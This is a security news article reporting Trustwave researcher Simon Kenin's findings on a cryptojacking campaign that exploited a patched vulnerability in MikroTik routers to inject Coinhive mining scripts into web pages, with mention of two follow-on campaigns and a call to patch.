A massive cryptojacking campaign that relies on compromised MikroTik routers serves users with pages injected with the Coinhive mining script.
It seems that the attacker initially mainly focused on compromising devices located in Brazil but devices in other geo-locations are now being affected as well, making it likely that the attack will spread across the world.
By following digital crumbs posted online by affected users and other researchers, Kenin mapped the campaign by “following” the Coinhive site-key the attacker is using.
He also pinpointed how the devices are getting compromised: the attacker is exploiting an old vulnerability (CVE-2018-14847) affecting MikroTik routers, which the manufacturer patched in April 2018.
“To MikroTik’s credit, they patched the vulnerability within a day of its discovery, but unfortunately there are hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave researcher Simon Kenin noted. The exploit allows the attacker to get unauthenticated remote admin access to any vulnerable MikroTik router.
The attacker used that access to first inject the Coinhive script into every web page that a user visited, and then only into custom error pages to make the attack less “loud” and likely to be spotted.
“So if a user receives an error page of any kind while web browsing, they will get this custom error page which will mine Coinhive for the attacker,” Kenin explained.
The attacker also made sure to add a persistence mechanism, scheduled tasks for updating if needed (e.g. in case Coinhive blocked the attacker’s current site-key and it has to be replaced with another), an alternative way to send commands to all compromised devices, and a backdoor.
Kenin also discovered that users who visit websites behind the infected routers are also served pages injected with the mining script.
New campaigns spring up
“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” Kenin noted.
“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily. Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker. As mentioned, servers that are connected to infected routers would also, in some cases, return an error page with Coinhive to users that are visiting those servers, no matter where on the internet they are visiting from.”
And, to make the matter worse, since he published details about the campaign, which is responsible for compromising over 180,000 MikroTik devices, two other campaigns have sprung up, counting 25,000+ and 15,000+ compromised devices respectively.
Three #cryptojacking campaigns targeting MikroTik routers.
Two using Coinhive, one using Crypto-Loot.
209,501 compromised devices.
— Bad Packets Report (@bad_packets) August 2, 2018
The other two campaign use different Coinhive site-keys, but that doesn’t mean that the attacker is a different individual or group. It could be that the initial attacker just switched to other keys after Kenin exposed the initial campaign.
“This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” he concluded.